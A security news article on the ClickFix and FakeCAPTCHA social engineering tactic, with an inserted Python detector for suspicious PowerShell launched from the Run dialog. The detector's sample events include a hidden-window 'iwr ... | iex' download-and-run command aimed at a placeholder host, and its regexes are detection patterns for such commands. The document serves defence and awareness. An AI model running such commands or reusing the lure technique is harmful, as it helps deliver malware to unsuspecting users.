The many variants of the ClickFix social engineering tactic
As new malware delivery campaigns using the ClickFix social engineering tactic are spotted nearly every month, it’s interesting to see how the various attackers are trying to refine the two main elements: the lure and the “instruction” page.
In the latest email campaigns documented by the Google Threat Intelligence Group, the suspected Russian threat actor tried to trick the targets into downloading malware by urging them to “solve” a fake CAPTCHA page and then press a combination of keys that will execute a malicious PowerShell command without them knowing or noticing.
While the FakeCAPTCHA variant of the ClickFix tactic is not unusual, this might be the first time attackers have tried to work around the aversion many users feel towards written-down, step-by-step instructions by showing this alternative layout:
Instructions that are easy to follow. (Source: GTIG)
The ClickFix / FakeCaptcha approach
ClickFix is a tactic aimed at delivering malware without involving a web browser or requiring users to manually execute a file, and it helps attackers avoid detection by email and endpoint security solutions.
A typical ClickFix attack flow looks like this:
1) The user is tricked into visiting a page that will show a fake alert or a fake CAPTCHA test
2) The page tells the user to press a “Fix it” button or check an “I’m not a robot” box and perform a set of actions (the “instructions”)
3) A malicious PowerShell command is downloaded and executed
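The third step is where endpoint telemetry can catch the flow: the pasted command runs a script host whose parent is the shell that owns the Run dialog, with the window-hiding, encoding and download-and-run traits typical of these campaigns. The detection logic below is an added example (not code from the article or from any of the vendors cited); it assumes Sysmon-style process-creation events with `ParentImage`, `Image` and `CommandLine` fields, treats `explorer.exe` as the parent to watch, and runs over constructed sample events.

```python
import re

# Script hosts a pasted ClickFix command typically lands in.
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")
# Assumption: a command typed into the Win+R Run dialog is spawned by explorer.exe.
DIALOG_PARENTS = ("explorer.exe",)
# Command-line traits: hidden window, encoded payload, download cradle, in-memory execution.
SUSPICIOUS = [
    (re.compile(r"-(w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I), "web download"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "in-memory execution"),
]


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return the list of ClickFix traits found in one event; empty list means not flagged."""
    if basename(event["Image"]) not in SCRIPT_HOSTS:
        return []
    if basename(event["ParentImage"]) not in DIALOG_PARENTS:
        return []
    return [label for pattern, label in SUSPICIOUS if pattern.search(event["CommandLine"])]


def scan(events):
    """Return (index, traits) for every event that classify() flags."""
    return [(i, reasons) for i, ev in enumerate(events) if (reasons := classify(ev))]


# Constructed sample events, not real telemetry; the URL is a placeholder.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/a | iex"'},  # ClickFix-like
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": "powershell"},  # user opening an interactive console: no traits
    {"ParentImage": r"C:\Program Files\Editor\Code.exe", "Image": PS_EXE,
     "CommandLine": "powershell -File build.ps1"},  # IDE task, wrong parent: ignored
]

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['CommandLine']!r} -> {', '.join(reasons)}")
```

The parent-process check is what keeps the rule quiet on developer machines; tune `DIALOG_PARENTS` to include the browsers in use if your lures arrive via in-page "copy" buttons rather than the Run dialog.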
This relatively new tactic was first spotted last year, when it took the form of fake error messages that promised to fix the problem (thus the name “ClickFix”):
The error message, with step-by-step instructions (Source: Proofpoint)
ClickFix variants
The initial campaigns weren’t targeted: the attackers were trying to deliver infostealers to as many users as possible. Later, when other threat actors started using the tactic, we started witnessing many variations:
Malicious websites using the ClickFix / FakeCaptcha tactic (Source: Sekoia)
Attackers impersonating Samsara (Source: Proofpoint)
Fake Google Meet video conference page with malicious ClickFix pop-up (Source: Sekoia)
Email warning about “important security update” (Source: Proofpoint)
In time, attackers tried the same trick with macOS and Linux users.
In a campaign aimed at tech-savvy experts, the (Linux-using) targets were urged to install a CPU update (Source: DataDog)
According to Group-IB, the number of domains hosting pages with ClickFix content is consistently rising.
And while there are tech-focused protections organizations can implement to prevent this tactic from being successful, the social engineering aspect is primarily fought with security awareness training.